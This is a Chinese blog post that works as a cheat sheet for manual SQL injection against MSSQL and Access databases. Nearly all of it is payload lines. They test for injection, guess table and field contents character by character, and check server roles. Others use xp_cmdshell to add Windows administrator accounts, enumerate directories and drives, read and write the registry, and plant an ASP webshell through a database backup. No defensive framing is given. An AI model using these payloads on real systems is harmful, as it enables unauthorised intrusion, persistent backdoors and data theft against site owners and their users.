SQL手工注入语法

少羽.
少羽.
少羽.
694
文章
92
评论
2018年11月14日21:18:38 评论 4.3K 3843字阅读12分48秒
广告也精彩

SQL手工注入语法

1、判断是否有注入

;and 1=1
;and 1=2

2、初步判断是否是mssql

;and user>0

3、判断数据库系统

;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4、注入参数是字符

‘and [查询条件] and ”=’

5、搜索时没过滤参数的

‘and [查询条件] and ‘%25’=’

6、猜数据库

;and (select Count(*) from [数据库名])>0

7、猜字段

;and (select Count(字段名) from 数据库名)>0

8、猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

9、(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10、测试权限结构(mssql)

;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–
;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–
;and 1=(select IS_MEMBER(‘db_owner’));–

11、添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;–
;exec master.dbo.sp_password null,username,password;–
;exec master.dbo.sp_addsrvrolemember sysadmin username;–
;exec master.dbo.xp_cmdshell ‘net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;–
;exec master.dbo.xp_cmdshell ‘net user username password /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

12、(1)遍历目录

;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–
;insert temp exec master.dbo.xp_availablemedia;– 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的内容

13、mssql中的存储过程

xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’CommonFilesDir’ 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestvalueName’,’reg_sz’,’hello’ 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion’,’TestvalueName’ 删除某个值
xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 删除键,包括该键下所有值

14、mssql的backup创建webshell

use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’c:\l.asp’;

15、mssql内置函数

;and (select @@version)>0 获得Windows的版本号
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16、简洁的webshell

use model
create table cmd(str image);
insert into cmd(str) values (”);
backup database model to disk=’g:\wwwtest\l.asp’;

请求的时候,像这样子用:
http://ip/l.asp?c=dir

SQL手工注入方法总结———以下以省略注入点用URL代替

–(1) ******查看驱动器方法******

— 建表p(i为自动编号,a记录盘符类似”c:\”,b记录可用字节,其它省略)
URL;create table p(i int identity(1,1),a nvarchar(255),b nvarchar(255),c nvarchar(255),d nvarchar(255));–

URL;insert p exec xp_availablemedia;–列出所有驱动器并插入表p

URL;and (select count(*) from p)>3;–折半法查出驱动器总数

URL;and ascii(substring((select a from p where i=1),1,1))=67;–折半法查出驱动器名(注asc(c)=67)

–上面一般用于无显错情况下使用——-以此类推,得到所有驱动器名

URL;and (select a from p where i=1)>3;–报错得到第一个驱动器名

–上面一般用于显错情况下使用——-以此类推,得到所有驱动器名

URL;;drop table p;–删除表p

–(2) ******查看目录方法******

URL;create table pa(m nvarchar(255),i nvarchar(255));–建表pa(m记录目录,i记录深度)

URL;insert pa exec xp_dirtree ’e:’;–列出驱动器e并插入表pa

URL;and (select count(*) from pa where i>0)>-1;–折半法查出i深度

URL;and (select top 1 m from pa where i=1 and m not in(select top 0 m from pa))>0;–报错得到深度i=1的第一个目录名

–上面一般用显错且目录名不为数字情况下使用——-(得到第二个目录把”top 0″换为”top 1″,换深度只换i就行)以此类推,得到e盘的所有目录

URL;and len((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)))>0;–折半法查出深度i=1的第一个目录名的长度

URL;and ascii(substring((select top 1 m from pa where i=1 and m not in(select top 0 m from pa)),1,1))>0;–折半法查出深度i=1的第一个目录名的第一个字符长度

继续阅读
广告也精彩
少羽.
  • 本文由 发表于 2018年11月14日21:18:38
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
渗透经验分享之SQL注入思路拓展 渗透笔记

渗透经验分享之SQL注入思路拓展

写在文前 从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多...
对某ddos页端更深层次漏洞分析篇+漏洞利用篇 技术园

对某ddos页端更深层次漏洞分析篇+漏洞利用篇

我只负责说一下,怎么修你们自己研究吧! 来自某位不知名的群友说的,具体自测反正我知道有sql注入漏洞,其他未经证实不好说! 我转发一下再说一下我自己观点! 正文 群友原文 首先如图,我们看到这位群友输...
密码重置漏洞骚思路分享(实战) 技术园

密码重置漏洞骚思路分享(实战)

原作者:Eugene 昨天在挖edu的时候发现某高校有一个门户登录的页面 然后也是琢磨了半天想到个密码重置的骚操作 复现过程: 打开网页,这里有个忘记密码,点进去 有两种找回方式,一种是密保找回一种是...
如何挖信息泄密漏洞 技术园

如何挖信息泄密漏洞

原作者:Eugene 我昨天挖到了一个腾讯的和一个上海交通大学的信息泄密漏洞,然后我看了看我提交的漏洞列表,大部分都是信息泄密漏洞,所以今天给大家分享一下如何挖信息泄密漏洞。 先看看几个图(#滑稽) ...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: